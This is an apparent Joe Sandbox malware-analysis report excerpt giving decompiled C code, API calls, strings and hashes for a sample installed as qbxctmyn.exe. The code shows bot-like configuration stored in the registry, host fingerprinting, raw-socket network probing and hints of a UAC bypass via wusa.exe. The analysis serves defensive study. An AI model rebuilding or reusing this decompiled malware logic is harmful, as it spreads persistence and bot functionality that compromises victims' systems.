                                                                                0x004083e5
                                                                                0x004083ea
                                                                                0x004083f3
                                                                                0x004083f9
                                                                                0x004083fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408414
                                                                                0x0040841a
                                                                                0x0040841c
                                                                                0x0040842d
                                                                                0x0040843e
                                                                                0x00408441
                                                                                0x00408447
                                                                                0x0040844a
                                                                                0x00000000
                                                                                0x0040844a
                                                                                0x0040841e
                                                                                0x00408421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408423
                                                                                0x00408426
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408428
                                                                                0x0040842b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040842b
                                                                                0x0040838d

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$localcfg
                                                                                • API String ID: 237177642-1194859034
                                                                                • Opcode ID: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                • Opcode Fuzzy Hash: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
                                                                                • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401D96 Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 95%
                                                                                			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x61;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 4;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}


























                                                                                0x00401d9f
                                                                                0x00401da9
                                                                                0x00401daf
                                                                                0x00401db4
                                                                                0x00401dbc
                                                                                0x00401dbe
                                                                                0x00401dce
                                                                                0x00401de0
                                                                                0x00401dd0
                                                                                0x00401ddb
                                                                                0x00401ddb
                                                                                0x00401de8
                                                                                0x00401dfc
                                                                                0x00401dff
                                                                                0x00401e10
                                                                                0x00401e14
                                                                                0x00401e22
                                                                                0x00401e22
                                                                                0x00401e2a
                                                                                0x00401e34
                                                                                0x00401e38
                                                                                0x00401e3e
                                                                                0x00401e46
                                                                                0x00401e4e
                                                                                0x00401e51
                                                                                0x00401e54
                                                                                0x00401e59
                                                                                0x00401e64
                                                                                0x00401e67
                                                                                0x00401e72
                                                                                0x00401e77
                                                                                0x00401e77
                                                                                0x00401e7f
                                                                                0x00401e84
                                                                                0x00401e8e
                                                                                0x00401e93
                                                                                0x00401e96
                                                                                0x00401ea0
                                                                                0x00401ea8
                                                                                0x00401ea2
                                                                                0x00401ea2
                                                                                0x00401ea2
                                                                                0x00401eb4
                                                                                0x00401eb9
                                                                                0x00401ebc
                                                                                0x00401ec1
                                                                                0x00401ec9
                                                                                0x00401ed3
                                                                                0x00401ed8
                                                                                0x00401edb
                                                                                0x00401ede
                                                                                0x00401ede
                                                                                0x00401ee1
                                                                                0x00401ee9
                                                                                0x00401eee
                                                                                0x00401ef1
                                                                                0x00401ef6
                                                                                0x00401f01
                                                                                0x00401f05
                                                                                0x00401f0e
                                                                                0x00401f11
                                                                                0x00401f11
                                                                                0x00401f16
                                                                                0x00401f1e
                                                                                0x00401f23
                                                                                0x00401f26
                                                                                0x00401f2b
                                                                                0x00401f36
                                                                                0x00401f3a
                                                                                0x00401f43
                                                                                0x00401f46
                                                                                0x00401f46
                                                                                0x00401f52
                                                                                0x00401f5e
                                                                                0x00401f65
                                                                                0x00401f69
                                                                                0x00401f72
                                                                                0x00401f77
                                                                                0x00401f7a
                                                                                0x00401f82
                                                                                0x00401f8c
                                                                                0x00401f9a
                                                                                0x00401fb7
                                                                                0x00401f9c
                                                                                0x00401fa3
                                                                                0x00401fae
                                                                                0x00401fa5
                                                                                0x00401fa5
                                                                                0x00401fa5
                                                                                0x00401fa3
                                                                                0x00401f8e
                                                                                0x00401f8e
                                                                                0x00401f8e
                                                                                0x00401fc0
                                                                                0x00401fc2
                                                                                0x00401fc2
                                                                                0x00401fd6
                                                                                0x00401fd9
                                                                                0x00401fde
                                                                                0x00401fea

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                • API String ID: 4207808166-1381319158
                                                                                • Opcode ID: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction ID: 4bec38004d2b42250697577447cb56bf839fa837f468b717733c20bdb0386e2e
                                                                                • Opcode Fuzzy Hash: 174b5597e53b85571f1c32fd197fd8fbccf035cef4f3f42155ce14a49909b689
                                                                                • Instruction Fuzzy Hash: A151FAB05003446FD330AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040199C Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}
















                                                                                0x004019ab
                                                                                0x004019ae
                                                                                0x004019b1
                                                                                0x004019bc
                                                                                0x004019c5
                                                                                0x004019c7
                                                                                0x004019cc
                                                                                0x004019ea
                                                                                0x004019f7
                                                                                0x004019f9
                                                                                0x004019fe
                                                                                0x00401ab6
                                                                                0x00000000
                                                                                0x00401a14
                                                                                0x00401a1b
                                                                                0x00401a1d
                                                                                0x00401a23
                                                                                0x00401a28
                                                                                0x00401abc
                                                                                0x00401abc
                                                                                0x00401abe
                                                                                0x00000000
                                                                                0x00401abe
                                                                                0x00401a3c
                                                                                0x00401a40
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a45
                                                                                0x00401a46
                                                                                0x00401a47
                                                                                0x00401a50
                                                                                0x00401a60
                                                                                0x00401a60
                                                                                0x00401a67
                                                                                0x00401aa1
                                                                                0x00401aa4
                                                                                0x00401aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401aaf
                                                                                0x00000000
                                                                                0x00401a69
                                                                                0x00401a6c
                                                                                0x00401a6d
                                                                                0x00401a73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a75
                                                                                0x00401a77
                                                                                0x00401a82
                                                                                0x00401a86
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a96
                                                                                0x00401a9b
                                                                                0x00000000
                                                                                0x00401a9b
                                                                                0x00401a91
                                                                                0x00401a93
                                                                                0x00401a93
                                                                                0x00000000
                                                                                0x00401a91
                                                                                0x00401a67
                                                                                0x004019fe
                                                                                0x00000000

                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 835516345-270533642
                                                                                • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3858F Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 00E3865A
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 00E3867B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 00E386A8
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00E386B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: "$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 237177642-589287442
                                                                                • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction ID: e7d7aaf9702b4af3cf8b9d1985e3bbfae2bd3a04f3cd8e7a0cf09a594e871417
                                                                                • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction Fuzzy Hash: 30C192B1900248BEEB119BA4DE8AEEF7FBDEB04304F145076F604F6151EA714A94CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                0x00402a62
                                                                                0x00402a7a
                                                                                0x00402a7d
                                                                                0x00402a86
                                                                                0x00402a8c
                                                                                0x00402a90
                                                                                0x00402aa0
                                                                                0x00402aa6
                                                                                0x00402aa8
                                                                                0x00402aae
                                                                                0x00402cd8
                                                                                0x00402cde
                                                                                0x00000000
                                                                                0x00402abd
                                                                                0x00402abd
                                                                                0x00402ac9
                                                                                0x00402ac9
                                                                                0x00402ad1
                                                                                0x00402ada
                                                                                0x00402ad3
                                                                                0x00402ad3
                                                                                0x00402ad3
                                                                                0x00402adb
                                                                                0x00402af4
                                                                                0x00402af9
                                                                                0x00402afe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b06
                                                                                0x00402b0e
                                                                                0x00402b14
                                                                                0x00402b18
                                                                                0x00402b20
                                                                                0x00402b24
                                                                                0x00402b28
                                                                                0x00402b30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b3a
                                                                                0x00402b3f
                                                                                0x00402b4a
                                                                                0x00402b50
                                                                                0x00402b52
                                                                                0x00402b58
                                                                                0x00402b6a
                                                                                0x00402b76
                                                                                0x00402b7c
                                                                                0x00402ca6
                                                                                0x00402cad
                                                                                0x00402cb3
                                                                                0x00402cbd
                                                                                0x00402cc7
                                                                                0x00402ccd
                                                                                0x00402ce0
                                                                                0x00000000
                                                                                0x00402ce0
                                                                                0x00402b85
                                                                                0x00402b96
                                                                                0x00402b98
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ba1
                                                                                0x00402ba6
                                                                                0x00402ba7
                                                                                0x00402bad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402bb3
                                                                                0x00402bb8
                                                                                0x00402bbd
                                                                                0x00402bbf
                                                                                0x00000000
                                                                                0x00402bc9
                                                                                0x00402bd1
                                                                                0x00402c77
                                                                                0x00402c77
                                                                                0x00402c79
                                                                                0x00402c7f
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bc5
                                                                                0x00000000
                                                                                0x00402bf3
                                                                                0x00402c08
                                                                                0x00402c0c
                                                                                0x00402c85
                                                                                0x00402c89
                                                                                0x00402c93
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402c93
                                                                                0x00402c12
                                                                                0x00402c1d
                                                                                0x00402c21
                                                                                0x00402c25
                                                                                0x00402c32
                                                                                0x00402c3e
                                                                                0x00402c41
                                                                                0x00402c4a
                                                                                0x00402c4b
                                                                                0x00402c5f
                                                                                0x00402c63
                                                                                0x00402c69
                                                                                0x00402c71
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c6b
                                                                                0x00402c4d
                                                                                0x00402c57
                                                                                0x00402c57
                                                                                0x00402c73
                                                                                0x00000000
                                                                                0x00402c73
                                                                                0x00402bd1
                                                                                0x00402bc9
                                                                                0x00402b8b
                                                                                0x00402b90
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402b90
                                                                                0x00402c95
                                                                                0x00402c95
                                                                                0x00402c9e
                                                                                0x00402ac3
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ca4
                                                                                0x00402ac9
                                                                                0x00402aae
                                                                                0x00000000

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00402A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00402A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                • htons.WS2_32(00000000), ref: 00402ADB
                                                                                • select.WS2_32 ref: 00402B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                • htons.WS2_32(?), ref: 00402B71
                                                                                • htons.WS2_32(?), ref: 00402B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E314E7 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 00E31601
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00E317D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $<$@$D
